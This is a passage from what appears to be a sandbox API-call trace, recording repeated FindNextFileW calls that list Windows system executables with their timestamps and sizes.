ftLastAccessTime.dwLowDateTime=0x29c351c3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29c351c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoconv.exe", cAlternateFileName="")) returned 1 [0107.893] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d19fde, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d19fde, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d19fde, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autofmt.exe", cAlternateFileName="")) returned 1 [0107.893] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5ab817, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e5ab817, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e5ab817, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="backgroundTaskHost.exe", cAlternateFileName="")) returned 1 [0107.894] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e28a6c3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e28a6c3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e28a6c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="BackgroundTransferHost.exe", cAlternateFileName="")) returned 1 [0107.894] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ff0078a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ff0078a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ff269e0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcastdvr.exe", cAlternateFileName="")) returned 1 [0107.894] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2843776b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2843776b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2843776b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsadmin.exe", cAlternateFileName="")) returned 1 [0107.894] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x282478e7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x282478e7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2826db41, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootcfg.exe", cAlternateFileName="")) returned 1 [0107.895] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2abda86e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2abda86e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2abda86e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthudtask.exe", cAlternateFileName="")) returned 1 [0107.895] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283064a3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x283064a3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x283064a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ByteCodeGenerator.exe", cAlternateFileName="")) returned 1 [0107.895] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cacls.exe", cAlternateFileName="")) returned 1 [0107.895] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fef838, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x51fef838, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x51fef838, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="calc.exe", cAlternateFileName="")) returned 1 [0107.896] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57230930, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x57230930, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x57230930, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CameraSettingsUIHost.exe", cAlternateFileName="")) returned 1 [0107.896] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b969e42, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b969e42, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b969e42, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa600, dwReserved0=0x0, dwReserved1=0x0, cFileName="CertEnrollCtrl.exe", cAlternateFileName="")) returned 1 [0107.896] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac26d23, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ac26d23, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ac26d23, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x57200, dwReserved0=0x0, dwReserved1=0x0, cFileName="certreq.exe", cAlternateFileName="")) returned 1 [0107.897] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac731d8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ac731d8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ac99437, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x119000, dwReserved0=0x0, dwReserved1=0x0, cFileName="certutil.exe", cAlternateFileName="")) returned 1 [0107.897] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fef838, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x51fef838, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x51fef838, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29200, dwReserved0=0x0, dwReserved1=0x0, cFileName="charmap.exe", cAlternateFileName="")) returned 1 [0107.897] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x314032d3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x314032d3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x314032d3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="CheckNetIsolation.exe", cAlternateFileName="")) returned 1 [0107.897] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290495be, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x290495be, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x290495be, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chkdsk.exe", cAlternateFileName="")) returned 1 [0107.897] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290495be, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x290495be, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x290495be, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chkntfs.exe", cAlternateFileName="")) returned 1 [0107.898] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b765fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29b765fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29b765fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="choice.exe", cAlternateFileName="")) returned 1 [0107.898] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c351c3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29c351c3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29c351c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cipher.exe", cAlternateFileName="")) returned 1 [0107.898] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fef838, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x51fef838, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x51fef838, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cleanmgr.exe", cAlternateFileName="")) returned 1 [0107.898] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bba6180, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bba6180, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bba6180, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="cliconfg.exe", cAlternateFileName="")) returned 1 [0107.899] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x284a9e8e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x284a9e8e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x284a9e8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="clip.exe", cAlternateFileName="")) returned 1 [0107.899] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe8e076, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2fe8e076, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2fe8e076, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbfb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CloudNotifications.exe", cAlternateFileName="")) returned 1 [0107.899] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe8e076, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2fe8e076, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2fe8e076, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="CloudStorageWizard.exe", cAlternateFileName="")) returned 1 [0107.899] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmd.exe", cAlternateFileName="")) returned 1 [0107.899] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba4ec65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba4ec65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba74eb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmdkey.exe", cAlternateFileName="")) returned 1 [0107.900] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x307328c0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x307328c0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x307328c0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmdl32.exe", cAlternateFileName="")) returned 1 [0107.904] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x307328c0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x307328c0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x307328c0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmmon32.exe", cAlternateFileName="")) returned 1 [0107.904] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x307328c0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x307328c0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x307328c0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmstp.exe", cAlternateFileName="")) returned 1 [0107.904] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x275e95db, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x275e95db, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x275e95db, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15200, dwReserved0=0x0, dwReserved1=0x0, cFileName="colorcpl.exe", cAlternateFileName="")) returned 1 [0107.905] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28de7026, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28de7026, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28de7026, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="comp.exe", cAlternateFileName="")) returned 1 [0107.905] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d19fde, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d19fde, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d19fde, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="compact.exe", cAlternateFileName="")) returned 1 [0107.905] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31665867, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x31665867, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x31665867, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="ComputerDefaults.exe", cAlternateFileName="")) returned 1 [0107.906] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316193ba, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x316193ba, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x316193ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="control.exe", cAlternateFileName="")) returned 1 [0107.906] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c351c3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29c351c3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29c351c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="convert.exe", cAlternateFileName="")) returned 1 [0107.906] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52015a87, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x52015a87, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x52015a87, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe628, dwReserved0=0x0, dwReserved1=0x0, cFileName="CredentialUIBroker.exe", cAlternateFileName="")) returned 1 [0107.906] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b943be8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b943be8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b943be8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="credwiz.exe", cAlternateFileName="")) returned 1 [0107.906] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0cef24, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0cef24, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0cef24, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x23400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cscript.exe", cAlternateFileName="")) returned 1 [0107.907] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3334e042, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3334e042, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3334e042, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ctfmon.exe", cAlternateFileName="")) returned 1 [0107.907] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31665867, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x31665867, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x31665867, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cttune.exe", cAlternateFileName="")) returned 1 [0107.907] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3153459f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3153459f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3153459f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="cttunesvr.exe", cAlternateFileName="")) returned 1 [0107.907] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26cd268a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x26cd268a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x26cd268a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dccw.exe", cAlternateFileName="")) returned 1 [0107.908] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aacf7fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aacf7fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aacf7fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="dcomcnfg.exe", cAlternateFileName="")) returned 1 [0107.908] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c351c3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29c351c3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29c351c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ddodiag.exe", cAlternateFileName="")) returned 1 [0107.908] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324412f4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x324412f4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x324412f4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DevicePairingWizard.exe", cAlternateFileName="")) returned 1 [0107.908] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3155a7fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3155a7fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3155a7fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceProperties.exe", cAlternateFileName="")) returned 1 [0107.909] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290495be, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x290495be, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x290495be, ftLastWriteTime.dwHighDateTime=0x1d112e3, 